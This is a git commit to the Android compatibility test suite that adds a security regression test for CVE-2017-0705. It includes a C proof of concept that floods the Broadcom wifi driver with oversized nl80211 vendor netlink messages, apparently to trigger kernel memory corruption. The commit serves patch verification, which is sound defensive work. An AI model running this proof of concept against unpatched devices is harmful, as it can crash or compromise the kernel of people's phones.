diff options
author | Andres Celis <celisa@google.com> | 2017-06-19 13:39:10 -0700 |
---|---|---|
committer | android-build-team Robot <android-build-team-robot@google.com> | 2017-06-26 20:41:07 +0000 |
commit | 59a0fedefae00dbd4f60c166aa98e709c36d2ae0 (patch) | |
tree | 7632a84b9ebd25aa1a3d296d15490dc6027f1cc1 | |
parent | 8fe9a498e368d3ec6a5466d5187389b8b832f472 (diff) | |
download | cts-59a0fedefae00dbd4f60c166aa98e709c36d2ae0.tar.gz |
CTS/STS test for Android Security b/34973477
Bug:34973477
Change-Id: I6b9389a0e41b64048b2241dc6478ed8958f5c904
(cherry picked from commit 399c07698b20cba79d245670c7261976186c1f15)
4 files changed, 305 insertions, 0 deletions
diff --git a/hostsidetests/security/AndroidTest.xml b/hostsidetests/security/AndroidTest.xml index 478cb763a37..7c0783c5582 100644 --- a/hostsidetests/security/AndroidTest.xml +++ b/hostsidetests/security/AndroidTest.xml @@ -61,6 +61,7 @@ <option name="push" value="Bug-35047780->/data/local/tmp/Bug-35047780" /> <option name="push" value="Bug-35048450->/data/local/tmp/Bug-35048450" /> <option name="push" value="Bug-35047217->/data/local/tmp/Bug-35047217" /> + <option name="push" value="CVE-2017-0705->/data/local/tmp/CVE-2017-0705" /> <option name="append-bitness" value="true" /> </target_preparer> <test class="com.android.compatibility.common.tradefed.testtype.JarHostTest" > diff --git a/hostsidetests/security/securityPatch/CVE-2017-0705/Android.mk b/hostsidetests/security/securityPatch/CVE-2017-0705/Android.mk new file mode 100644 index 00000000000..bbde6e23cff --- /dev/null +++ b/hostsidetests/security/securityPatch/CVE-2017-0705/Android.mk @@ -0,0 +1,36 @@ +# Copyright (C) 2017 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2017-0705
+LOCAL_SRC_FILES := poc.c
+LOCAL_SHARED_LIBRARIES := libnl
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0705/poc.c b/hostsidetests/security/securityPatch/CVE-2017-0705/poc.c new file mode 100644 index 00000000000..8d484347e13 --- /dev/null +++ b/hostsidetests/security/securityPatch/CVE-2017-0705/poc.c @@ -0,0 +1,257 @@ +/** + * Copyright (C) 2017 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#include <stdio.h> +#include <stdlib.h> +#include <string.h> +#include <errno.h> +#include <unistd.h> +#include <signal.h> +#include <sys/types.h> +#include <sys/socket.h> +#include <linux/netlink.h> + +#include <netlink/netlink.h> +#include <netlink/genl/genl.h> +#include <netlink/genl/ctrl.h> +#include <net/if.h> +#include <linux/nl80211.h> + +#define OUI_GOOGLE 0x001A11 +#define ANDROID_NL80211_SUBCMD_RTT_RANGE_START 0x1100 +#define F1_32 0x41414141 +#define WL_CHANSPEC_BW_80 0x2000 + +enum wl_vendor_subcmd { + BRCM_VENDOR_SCMD_UNSPEC, + BRCM_VENDOR_SCMD_PRIV_STR, + GSCAN_SUBCMD_GET_CAPABILITIES = 0x1000, + GSCAN_SUBCMD_SET_CONFIG, + GSCAN_SUBCMD_SET_SCAN_CONFIG, + GSCAN_SUBCMD_ENABLE_GSCAN, + GSCAN_SUBCMD_GET_SCAN_RESULTS, + GSCAN_SUBCMD_SCAN_RESULTS, + GSCAN_SUBCMD_SET_HOTLIST, + GSCAN_SUBCMD_SET_SIGNIFICANT_CHANGE_CONFIG, + GSCAN_SUBCMD_ENABLE_FULL_SCAN_RESULTS, + GSCAN_SUBCMD_GET_CHANNEL_LIST, + ANDR_WIFI_SUBCMD_GET_FEATURE_SET, + ANDR_WIFI_SUBCMD_GET_FEATURE_SET_MATRIX, + ANDR_WIFI_RANDOM_MAC_OUI, + ANDR_WIFI_NODFS_CHANNELS, + ANDR_WIFI_SET_COUNTRY, + GSCAN_SUBCMD_SET_EPNO_SSID, + WIFI_SUBCMD_SET_SSID_WHITELIST, + WIFI_SUBCMD_SET_LAZY_ROAM_PARAMS, + WIFI_SUBCMD_ENABLE_LAZY_ROAM, + WIFI_SUBCMD_SET_BSSID_PREF, + WIFI_SUBCMD_SET_BSSID_BLACKLIST, + GSCAN_SUBCMD_ANQPO_CONFIG, + WIFI_SUBCMD_SET_RSSI_MONITOR, + RTT_SUBCMD_SET_CONFIG = 0x1100, + RTT_SUBCMD_CANCEL_CONFIG, + RTT_SUBCMD_GETCAPABILITY, + LSTATS_SUBCMD_GET_INFO = 0x1200, + DEBUG_START_LOGGING = 0x1400, + DEBUG_TRIGGER_MEM_DUMP, + DEBUG_GET_MEM_DUMP, + DEBUG_GET_VER, + DEBUG_GET_RING_STATUS, + DEBUG_GET_RING_DATA, + DEBUG_GET_FEATURE, + DEBUG_RESET_LOGGING, + WIFI_OFFLOAD_SUBCMD_START_MKEEP_ALIVE = 0x1600, + WIFI_OFFLOAD_SUBCMD_STOP_MKEEP_ALIVE, + /* Add more sub commands here */ + VENDOR_SUBCMD_MAX +}; + +enum debug_attributes { + DEBUG_ATTRIBUTE_GET_DRIVER, + DEBUG_ATTRIBUTE_GET_FW, + DEBUG_ATTRIBUTE_RING_ID, + DEBUG_ATTRIBUTE_RING_NAME, + DEBUG_ATTRIBUTE_RING_FLAGS, + DEBUG_ATTRIBUTE_LOG_LEVEL, + DEBUG_ATTRIBUTE_LOG_TIME_INTVAL, + DEBUG_ATTRIBUTE_LOG_MIN_DATA_SIZE, + DEBUG_ATTRIBUTE_FW_DUMP_LEN, + DEBUG_ATTRIBUTE_FW_DUMP_DATA, + DEBUG_ATTRIBUTE_RING_DATA, + DEBUG_ATTRIBUTE_RING_STATUS, + DEBUG_ATTRIBUTE_RING_NUM +}; + + +enum gscan_attributes { + GSCAN_ATTRIBUTE_NUM_BUCKETS = 10, + GSCAN_ATTRIBUTE_BASE_PERIOD, + GSCAN_ATTRIBUTE_BUCKETS_BAND, + GSCAN_ATTRIBUTE_BUCKET_ID, + GSCAN_ATTRIBUTE_BUCKET_PERIOD, + GSCAN_ATTRIBUTE_BUCKET_NUM_CHANNELS, + GSCAN_ATTRIBUTE_BUCKET_CHANNELS, + GSCAN_ATTRIBUTE_NUM_AP_PER_SCAN, + GSCAN_ATTRIBUTE_REPORT_THRESHOLD, + GSCAN_ATTRIBUTE_NUM_SCANS_TO_CACHE, + GSCAN_ATTRIBUTE_BAND = GSCAN_ATTRIBUTE_BUCKETS_BAND, + GSCAN_ATTRIBUTE_ENABLE_FEATURE = 20, + GSCAN_ATTRIBUTE_SCAN_RESULTS_COMPLETE, + GSCAN_ATTRIBUTE_FLUSH_FEATURE, + GSCAN_ATTRIBUTE_ENABLE_FULL_SCAN_RESULTS, + GSCAN_ATTRIBUTE_REPORT_EVENTS, + /* remaining reserved for additional attributes */ + GSCAN_ATTRIBUTE_NUM_OF_RESULTS = 30, + GSCAN_ATTRIBUTE_FLUSH_RESULTS, + GSCAN_ATTRIBUTE_SCAN_RESULTS, /* flat array of wifi_scan_result */ + GSCAN_ATTRIBUTE_SCAN_ID, /* indicates scan number */ + GSCAN_ATTRIBUTE_SCAN_FLAGS, /* indicates if scan was aborted */ + GSCAN_ATTRIBUTE_AP_FLAGS, /* flags on significant change event */ + GSCAN_ATTRIBUTE_NUM_CHANNELS, + GSCAN_ATTRIBUTE_CHANNEL_LIST, + /* remaining reserved for additional attributes */ + GSCAN_ATTRIBUTE_SSID = 40, + GSCAN_ATTRIBUTE_BSSID, + GSCAN_ATTRIBUTE_CHANNEL, + GSCAN_ATTRIBUTE_RSSI, + GSCAN_ATTRIBUTE_TIMESTAMP, + GSCAN_ATTRIBUTE_RTT, + GSCAN_ATTRIBUTE_RTTSD, + /* remaining reserved for additional attributes */ + GSCAN_ATTRIBUTE_HOTLIST_BSSIDS = 50, + GSCAN_ATTRIBUTE_RSSI_LOW, + GSCAN_ATTRIBUTE_RSSI_HIGH, + GSCAN_ATTRIBUTE_HOSTLIST_BSSID_ELEM, + GSCAN_ATTRIBUTE_HOTLIST_FLUSH, + /* remaining reserved for additional attributes */ + GSCAN_ATTRIBUTE_RSSI_SAMPLE_SIZE = 60, + GSCAN_ATTRIBUTE_LOST_AP_SAMPLE_SIZE, + GSCAN_ATTRIBUTE_MIN_BREACHING, + GSCAN_ATTRIBUTE_SIGNIFICANT_CHANGE_BSSIDS, + GSCAN_ATTRIBUTE_SIGNIFICANT_CHANGE_FLUSH, + /* EPNO */ + GSCAN_ATTRIBUTE_EPNO_SSID_LIST = 70, + GSCAN_ATTRIBUTE_EPNO_SSID, + GSCAN_ATTRIBUTE_EPNO_SSID_LEN, + GSCAN_ATTRIBUTE_EPNO_RSSI, + GSCAN_ATTRIBUTE_EPNO_FLAGS, + GSCAN_ATTRIBUTE_EPNO_AUTH, + GSCAN_ATTRIBUTE_EPNO_SSID_NUM, + GSCAN_ATTRIBUTE_EPNO_FLUSH, + /* Roam SSID Whitelist and BSSID pref */ + GSCAN_ATTRIBUTE_WHITELIST_SSID = 80, + GSCAN_ATTRIBUTE_NUM_WL_SSID, + GSCAN_ATTRIBUTE_WL_SSID_LEN, + GSCAN_ATTRIBUTE_WL_SSID_FLUSH, + GSCAN_ATTRIBUTE_WHITELIST_SSID_ELEM, + GSCAN_ATTRIBUTE_NUM_BSSID, + GSCAN_ATTRIBUTE_BSSID_PREF_LIST, + GSCAN_ATTRIBUTE_BSSID_PREF_FLUSH, + GSCAN_ATTRIBUTE_BSSID_PREF, + GSCAN_ATTRIBUTE_RSSI_MODIFIER, + /* Roam cfg */ + GSCAN_ATTRIBUTE_A_BAND_BOOST_THRESHOLD = 90, + GSCAN_ATTRIBUTE_A_BAND_PENALTY_THRESHOLD, + GSCAN_ATTRIBUTE_A_BAND_BOOST_FACTOR, + GSCAN_ATTRIBUTE_A_BAND_PENALTY_FACTOR, + GSCAN_ATTRIBUTE_A_BAND_MAX_BOOST, + GSCAN_ATTRIBUTE_LAZY_ROAM_HYSTERESIS, + GSCAN_ATTRIBUTE_ALERT_ROAM_RSSI_TRIGGER, + GSCAN_ATTRIBUTE_LAZY_ROAM_ENABLE, + /* BSSID blacklist */ + GSCAN_ATTRIBUTE_BSSID_BLACKLIST_FLUSH = 100, + GSCAN_ATTRIBUTE_BLACKLIST_BSSID, + GSCAN_ATTRIBUTE_ANQPO_HS_LIST = 110, + GSCAN_ATTRIBUTE_ANQPO_HS_LIST_SIZE, + GSCAN_ATTRIBUTE_ANQPO_HS_NETWORK_ID, + GSCAN_ATTRIBUTE_ANQPO_HS_NAI_REALM, + GSCAN_ATTRIBUTE_ANQPO_HS_ROAM_CONSORTIUM_ID, + GSCAN_ATTRIBUTE_ANQPO_HS_PLMN, + /* Adaptive scan attributes */ + GSCAN_ATTRIBUTE_BUCKET_STEP_COUNT = 120, + GSCAN_ATTRIBUTE_BUCKET_MAX_PERIOD, + GSCAN_ATTRIBUTE_MAX +}; + + +#define ETHER_ADDR_LEN 6 +struct __attribute__ ((packed)) _ether_addr { + uint8_t octet[ETHER_ADDR_LEN]; +}; + +static int l1; +static int l2; +static void test(struct nl_sock *socket, int d_id, int if_index) +{ + struct nl_msg *msg; + struct nl_cb *cb; + struct nl_msg *vendor_cmd, *nested_msg; + struct nlattr *nl_vendor_cmds, *nested, *nested2, *nested3; + int err, i, j = 0, k = 0, ret; + struct _ether_addr mac; + memset(&mac, 0x41, sizeof(mac)); + + // Allocate the messages and callback handler. + for (j = l1; j < 1024; j++) { + for(k = l2; k < 128; k++) { + msg = nlmsg_alloc_size(16384); + if (!msg) { + exit(EXIT_FAILURE); + } + + genlmsg_put(msg, 0, 0, d_id, 0, 0, NL80211_CMD_VENDOR, 0); + nla_put_u32(msg, NL80211_ATTR_IFINDEX, if_index); + nla_put_u32(msg, NL80211_ATTR_WIPHY, 0); + nla_put_u64(msg, NL80211_ATTR_WDEV, 1); + nla_put_u32(msg, NL80211_ATTR_VENDOR_ID, OUI_GOOGLE); + nla_put_u32(msg, NL80211_ATTR_VENDOR_SUBCMD, GSCAN_SUBCMD_SET_SIGNIFICANT_CHANGE_CONFIG); + + /* construct the vendor cmd */ + nl_vendor_cmds = nla_nest_start(msg, NL80211_ATTR_VENDOR_DATA); + + nested = nla_nest_start(msg, GSCAN_ATTRIBUTE_SIGNIFICANT_CHANGE_BSSIDS); + for (i = 0; i < j; i++) { + nested2 = nla_nest_start(msg, i); + nla_nest_end(msg, nested2); + } + for (i = 0; i < k; i++) { + nested2 = nla_nest_start(msg, i); + nla_put(msg, GSCAN_ATTRIBUTE_BSSID, sizeof(mac), &mac); + nla_put_u8(msg, GSCAN_ATTRIBUTE_RSSI_LOW, 0x41); + nla_put_u8(msg, GSCAN_ATTRIBUTE_RSSI_HIGH, 0x41); + nla_nest_end(msg, nested2); + } + nla_nest_end(msg, nested); + nla_nest_end(msg, nl_vendor_cmds); + + nl_send_auto_complete(socket, msg); + nlmsg_free(msg); + } + } +} + +int main(int argc, char **argv) +{ + int if_index = if_nametoindex("wlan0"); // Use this wireless interface for scanning. + l1 = 157; + l2 = 0; + // Open socket to kernel. + struct nl_sock *socket = nl_socket_alloc(); // Allocate new netlink socket in memory. + genl_connect(socket); // Create file descriptor and bind socket. + int driver_id = genl_ctrl_resolve(socket, "nl80211"); // Find the nl80211 driver ID. + + test(socket, driver_id, if_index); +} diff --git a/hostsidetests/security/src/android/security/cts/Poc17_07.java b/hostsidetests/security/src/android/security/cts/Poc17_07.java index ad69fd83d58..8a76f136bde 100644 --- a/hostsidetests/security/src/android/security/cts/Poc17_07.java +++ b/hostsidetests/security/src/android/security/cts/Poc17_07.java @@ -42,4 +42,15 @@ public class Poc17_07 extends SecurityTestCase { AdbUtils.runCommandLine("cat /dev/port", getDevice()); } } + + /** + * b/34973477 + */ + @SecurityTest + public void testPocCVE_2017_0705() throws Exception { + enableAdbRoot(getDevice()); + if(containsDriver(getDevice(), "/proc/net/psched")) { + AdbUtils.runPoc("CVE-2017-0705", getDevice(), 60); + } + } } |